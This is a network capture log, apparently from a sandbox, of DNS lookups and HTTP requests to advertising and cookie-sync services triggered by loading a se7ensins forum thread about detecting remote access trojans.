https://mv.outbrain.com/Multivac/api/platforms?contentUrl=https%3A%2F%2Fwww.se7ensins.com%2Fforums%2Fthreads%2Fhow-to-tell-if-youve-been-ratted.470346%2F&idx=0&rand=88909&widgetJSId=AR_3&va=true&et=true&format=html&px=0&py=0&vpd=0&cw=970&settings=true&recs=true&key=FREES104AH2PELD73BHE4H9I0&tch=0&adblck=false&abwl=false&ab=0&wl=0&obRecsAbtestVars=1550:5795&activeTab=false&version=2010813&sig=kmk2fG1c&apv=false&osLang=en-US&winW=970&winH=250&scrW=1280&scrH=720&dpr=1&secured=true&cnsntv2=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&cmpStat=1&ccpaStat=0&iframe=true&chs=1&ogn=https%3A%2F%2Fwww.se7ensins.com%2Fforums%2Fthreads%2Fhow-to-tell-if-youve-been-ratted.470346%2F

Request

GET /Multivac/api/platforms?contentUrl=https%3A%2F%2Fwww.se7ensins.com%2Fforums%2Fthreads%2Fhow-to-tell-if-youve-been-ratted.470346%2F&idx=0&rand=88909&widgetJSId=AR_3&va=true&et=true&format=html&px=0&py=0&vpd=0&cw=970&settings=true&recs=true&key=FREES104AH2PELD73BHE4H9I0&tch=0&adblck=false&abwl=false&ab=0&wl=0&obRecsAbtestVars=1550:5795&activeTab=false&version=2010813&sig=kmk2fG1c&apv=false&osLang=en-US&winW=970&winH=250&scrW=1280&scrH=720&dpr=1&secured=true&cnsntv2=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&cmpStat=1&ccpaStat=0&iframe=true&chs=1&ogn=https%3A%2F%2Fwww.se7ensins.com%2Fforums%2Fthreads%2Fhow-to-tell-if-youve-been-ratted.470346%2F HTTP/2.0
host: mv.outbrain.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: script
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

content-type: text/javascript; charset=UTF-8
expires: Thu, 01 Jan 1970 00:00:00 GMT
cache-control: no-cache
pragma: no-cache
p3p: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
set-cookie: obuid=28a26932-b4ab-4843-9538-ee3d0b42bdbf; Max-Age=7776000; Expires=Sat, 24 Aug 2024 02:06:54 GMT; Path=/; Domain=outbrain.com
x-traceid: 2f750e6e5707f25eba5c1b9ae869bca1
content-encoding: br
strict-transport-security: max-age=31536000; includeSubDomains; preload
accept-ranges: bytes
via: 1.1 varnish, 1.1 varnish
date: Sun, 26 May 2024 02:06:54 GMT
x-served-by: cache-chi-klot8100022-CHI, cache-lcy-eglc8600040-LCY
x-cache: MISS, MISS
x-cache-hits: 0, 0
x-timer: S1716689215.523140,VS0,VE193
vary: Accept-Encoding, User-Agent
traffic-path: CHIDC2, CHI, LCY, Europe2
content-length: 10418
DNS

outbrain.map.fastly.net

Request

outbrain.map.fastly.net

IN A

Response

outbrain.map.fastly.net

IN A

151.101.62.132
DNS

pbs-cs.yellowblue.io

Request

pbs-cs.yellowblue.io

IN A

Response

pbs-cs.yellowblue.io

IN A

54.217.173.39

pbs-cs.yellowblue.io

IN A

54.170.105.17

pbs-cs.yellowblue.io

IN A

52.18.156.159
DNS

outbrain.map.fastly.net

Request

outbrain.map.fastly.net

IN AAAA

Response
DNS

pbs-cs.yellowblue.io

Request

pbs-cs.yellowblue.io

IN AAAA

Response
DNS

132.74.75.146.in-addr.arpa

Request

132.74.75.146.in-addr.arpa

IN PTR

Response
DNS

17.105.170.54.in-addr.arpa

Request

17.105.170.54.in-addr.arpa

IN PTR

Response

17.105.170.54.in-addr.arpa

IN PTR

ec2-54-170-105-17 eu-west-1compute amazonawscom
DNS

cdn.springserve.com

Request

cdn.springserve.com

IN A

Response

cdn.springserve.com

IN A

3.162.140.120

cdn.springserve.com

IN A

3.162.140.49

cdn.springserve.com

IN A

3.162.140.60

cdn.springserve.com

IN A

3.162.140.39
DNS

cdn.springserve.com

Request

cdn.springserve.com

IN A

Response

cdn.springserve.com

IN A

3.162.140.60

cdn.springserve.com

IN A

3.162.140.120

cdn.springserve.com

IN A

3.162.140.39

cdn.springserve.com

IN A

3.162.140.49
DNS

cdn.springserve.com

Request

cdn.springserve.com

IN AAAA

Response
GET

https://cdn.springserve.com/assets/0/playerJS/frstrOSd_8.js

Request

GET /assets/0/playerJS/frstrOSd_8.js HTTP/2.0
host: cdn.springserve.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: script
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

content-type: application/javascript
last-modified: Tue, 19 Dec 2023 17:05:22 GMT
x-amz-server-side-encryption: AES256
server: AmazonS3
content-encoding: gzip
date: Wed, 22 May 2024 19:12:38 GMT
etag: W/"444cf48a5c80580cd5feb3ddc768bee1"
vary: Accept-Encoding
x-cache: Hit from cloudfront
via: 1.1 f0868511430dcb4e806371168cafb072.cloudfront.net (CloudFront)
x-amz-cf-pop: DUB56-P2
x-amz-cf-id: hiaDv9czWIp_B90dfQv53Y9pHlEdPvCmgzRQP06jsdZg99Wn7mmCIA==
age: 328521
DNS

chidc2.outbrain.org

Request

chidc2.outbrain.org

IN A

Response

chidc2.outbrain.org

IN A

50.31.142.31
DNS

cm.adform.net

Request

cm.adform.net

IN A

Response

cm.adform.net

IN CNAME

track-eu.adformnet.akadns.net

track-eu.adformnet.akadns.net

IN A

37.157.5.84

track-eu.adformnet.akadns.net

IN A

37.157.4.28

track-eu.adformnet.akadns.net

IN A

37.157.5.132

track-eu.adformnet.akadns.net

IN A

37.157.5.133

track-eu.adformnet.akadns.net

IN A

37.157.4.29
DNS

csync.loopme.me

Request

csync.loopme.me

IN A

Response

csync.loopme.me

IN CNAME

envoy-hl.envoy-csync1.core-b8mf.ov1o.com

envoy-hl.envoy-csync1.core-b8mf.ov1o.com

IN A

35.214.244.63

envoy-hl.envoy-csync1.core-b8mf.ov1o.com

IN A

35.214.185.183

envoy-hl.envoy-csync1.core-b8mf.ov1o.com

IN A

35.214.200.71

envoy-hl.envoy-csync1.core-b8mf.ov1o.com

IN A

35.214.244.87

envoy-hl.envoy-csync1.core-b8mf.ov1o.com

IN A

35.214.131.164

envoy-hl.envoy-csync1.core-b8mf.ov1o.com

IN A

35.214.142.145

envoy-hl.envoy-csync1.core-b8mf.ov1o.com

IN A

35.214.154.234
DNS

match.sharethrough.com

Request

match.sharethrough.com

IN A

Response

match.sharethrough.com

IN CNAME

match-eu-central-1-ecs.sharethrough.com

match-eu-central-1-ecs.sharethrough.com

IN A

3.67.74.124

match-eu-central-1-ecs.sharethrough.com

IN A

18.192.200.108

match-eu-central-1-ecs.sharethrough.com

IN A

18.158.126.136

match-eu-central-1-ecs.sharethrough.com

IN A

18.159.229.46

match-eu-central-1-ecs.sharethrough.com

IN A

18.194.142.248

match-eu-central-1-ecs.sharethrough.com

IN A

18.158.171.68

match-eu-central-1-ecs.sharethrough.com

IN A

18.197.199.178

match-eu-central-1-ecs.sharethrough.com

IN A

18.195.126.233
DNS

contextual.media.net

Request

contextual.media.net

IN A

Response

contextual.media.net

IN A

23.55.96.24
DNS

chidc2.outbrain.org

Request

chidc2.outbrain.org

IN AAAA

Response
DNS

ssbsync.smartadserver.com

Request

ssbsync.smartadserver.com

IN A

Response

ssbsync.smartadserver.com

IN CNAME

ssbsync-geo.smartadserver.com

ssbsync-geo.smartadserver.com

IN CNAME

usersync-geo-global.usersync-prod-sas.akadns.net

usersync-geo-global.usersync-prod-sas.akadns.net

IN CNAME

ssbsync-euw1.smartadserver.com

ssbsync-euw1.smartadserver.com

IN A

81.17.55.109

ssbsync-euw1.smartadserver.com

IN A

89.149.192.244

ssbsync-euw1.smartadserver.com

IN A

81.17.55.171

ssbsync-euw1.smartadserver.com

IN A

89.149.192.196

ssbsync-euw1.smartadserver.com

IN A

81.17.55.108

ssbsync-euw1.smartadserver.com

IN A

89.149.192.197

ssbsync-euw1.smartadserver.com

IN A

89.149.192.75

ssbsync-euw1.smartadserver.com

IN A

81.17.55.122

ssbsync-euw1.smartadserver.com

IN A

89.149.192.245

ssbsync-euw1.smartadserver.com

IN A

81.17.55.170

ssbsync-euw1.smartadserver.com

IN A

89.149.192.76

ssbsync-euw1.smartadserver.com

IN A

81.17.55.123
DNS

image8.pubmatic.com

Request

image8.pubmatic.com

IN A

Response

image8.pubmatic.com

IN CNAME

image8-v2.pubmnet.com

image8-v2.pubmnet.com

IN CNAME

imgsync-amsfpairbc.pubmnet.com

imgsync-amsfpairbc.pubmnet.com

IN A

198.47.127.18
DNS

us-u.openx.net

Request

us-u.openx.net

IN A

Response

us-u.openx.net

IN A

35.244.159.8

us-u.openx.net

IN A

34.98.64.218
DNS

track-eu.adformnet.akadns.net

Request

track-eu.adformnet.akadns.net

IN A

Response

track-eu.adformnet.akadns.net

IN A

37.157.6.243

track-eu.adformnet.akadns.net

IN A

37.157.6.232

track-eu.adformnet.akadns.net

IN A

37.157.6.237

track-eu.adformnet.akadns.net

IN A

37.157.6.254

track-eu.adformnet.akadns.net

IN A

37.157.6.233
DNS

120.140.162.3.in-addr.arpa

Request

120.140.162.3.in-addr.arpa

IN PTR

Response

120.140.162.3.in-addr.arpa

IN PTR

server-3-162-140-120dub56r cloudfrontnet
GET

https://csync.loopme.me/?pubid=11362&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&redirect=https%3A%2F%2Fcs.yellowblue.io%2Fcs%3Faid%3D11571%26id%3D%7Bdevice_id%7D

Request

GET /?pubid=11362&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&redirect=https%3A%2F%2Fcs.yellowblue.io%2Fcs%3Faid%3D11571%26id%3D%7Bdevice_id%7D HTTP/2.0
host: csync.loopme.me
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://pbs-cs.yellowblue.io/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 307

set-cookie: viewer_token=bdca5805-de9f-4696-97fe-8bb334fbe5f4; path=/; domain=csync.loopme.me; secure; HttpOnly; Expires=Mon, 26-Aug-2024 02:06:56 GMT; SameSite=None
location: https://cs.yellowblue.io/cs?aid=11571&id=bdca5805-de9f-4696-97fe-8bb334fbe5f4&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&gdpr=1
content-length: 0
date: Sun, 26 May 2024 02:06:56 GMT
server: _
DNS

bh.contextweb.com

Request

bh.contextweb.com

IN A

Response

bh.contextweb.com

IN CNAME

am1-bh.contextweb.com

am1-bh.contextweb.com

IN CNAME

am1-direct-bgp.contextweb.com

am1-direct-bgp.contextweb.com

IN A

208.93.169.131
DNS

sync.1rx.io

Request

sync.1rx.io

IN A

Response

sync.1rx.io

IN A

46.228.174.117
DNS

ads.stickyadstv.com

Request

ads.stickyadstv.com

IN A

Response

ads.stickyadstv.com

IN CNAME

ip1.ads.stickyadstv.com.akadns.net

ip1.ads.stickyadstv.com.akadns.net

IN CNAME

ip2.ads.stickyadstv.com.akadns.net

ip2.ads.stickyadstv.com.akadns.net

IN CNAME

eu-west-dual.ads.stickyadstv.com.akadns.net

eu-west-dual.ads.stickyadstv.com.akadns.net

IN A

154.57.158.116

eu-west-dual.ads.stickyadstv.com.akadns.net

IN A

154.57.158.115
DNS

envoy-hl.envoy-csync1.core-b8mf.ov1o.com

Request

envoy-hl.envoy-csync1.core-b8mf.ov1o.com

IN A

Response

envoy-hl.envoy-csync1.core-b8mf.ov1o.com

IN A

35.214.185.183

envoy-hl.envoy-csync1.core-b8mf.ov1o.com

IN A

35.214.200.71

envoy-hl.envoy-csync1.core-b8mf.ov1o.com

IN A

35.214.142.145

envoy-hl.envoy-csync1.core-b8mf.ov1o.com

IN A

35.214.154.234

envoy-hl.envoy-csync1.core-b8mf.ov1o.com

IN A

35.214.244.63

envoy-hl.envoy-csync1.core-b8mf.ov1o.com

IN A

35.214.131.164

envoy-hl.envoy-csync1.core-b8mf.ov1o.com

IN A

35.214.244.87
DNS

contextual.media.net

Request

contextual.media.net

IN A

Response

contextual.media.net

IN A

23.55.96.24
DNS

track-eu.adformnet.akadns.net

Request

track-eu.adformnet.akadns.net

IN AAAA

Response
DNS

contextual.media.net

Request

contextual.media.net

IN AAAA

Response
DNS

us-u.openx.net

Request

us-u.openx.net

IN A

Response

us-u.openx.net

IN A

34.98.64.218

us-u.openx.net

IN A

35.244.159.8
DNS

envoy-hl.envoy-csync1.core-b8mf.ov1o.com

Request

envoy-hl.envoy-csync1.core-b8mf.ov1o.com

IN AAAA

Response
DNS

ap.lijit.com

Request

ap.lijit.com

IN A

Response

ap.lijit.com

IN CNAME

vap.lijit.com

vap.lijit.com

IN CNAME

emeas.vap.lijit.com

emeas.vap.lijit.com

IN CNAME

eu.vap.lijit.com

eu.vap.lijit.com

IN CNAME

blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com

blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com

IN A

52.48.211.135

blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com

IN A

52.19.106.158

blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com

IN A

18.203.179.220

blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com

IN A

52.209.111.174

blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com

IN A

34.252.158.198

blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com

IN A

34.240.192.124

blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com

IN A

54.78.77.149

blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com

IN A

54.155.222.129
DNS

onetag-sys.com

Request

onetag-sys.com

IN A

Response

onetag-sys.com

IN A

51.89.9.251

onetag-sys.com

IN A

51.75.86.98

onetag-sys.com

IN A

51.89.9.254

onetag-sys.com

IN A

51.89.9.252

onetag-sys.com

IN A

51.38.120.206

onetag-sys.com

IN A

51.89.9.253
DNS

secure-assets.rubiconproject.com

Request

secure-assets.rubiconproject.com

IN A

Response

secure-assets.rubiconproject.com

IN CNAME

digicertwc.rubiconproject.com.edgekey.net

digicertwc.rubiconproject.com.edgekey.net

IN CNAME

e8960.e2.akamaiedge.net

e8960.e2.akamaiedge.net

IN A

104.68.78.171
DNS

us-u.openx.net

Request

us-u.openx.net

IN AAAA

Response
DNS

ssbsync-euw1.smartadserver.com

Request

ssbsync-euw1.smartadserver.com

IN A

Response

ssbsync-euw1.smartadserver.com

IN A

81.17.55.171

ssbsync-euw1.smartadserver.com

IN A

89.149.192.244

ssbsync-euw1.smartadserver.com

IN A

81.17.55.123

ssbsync-euw1.smartadserver.com

IN A

81.17.55.122

ssbsync-euw1.smartadserver.com

IN A

89.149.192.76

ssbsync-euw1.smartadserver.com

IN A

89.149.192.197

ssbsync-euw1.smartadserver.com

IN A

89.149.192.245

ssbsync-euw1.smartadserver.com

IN A

89.149.192.196

ssbsync-euw1.smartadserver.com

IN A

81.17.55.108

ssbsync-euw1.smartadserver.com

IN A

81.17.55.109

ssbsync-euw1.smartadserver.com

IN A

81.17.55.170

ssbsync-euw1.smartadserver.com

IN A

89.149.192.75
DNS

imgsync-amsfpairbc.pubmnet.com

Request

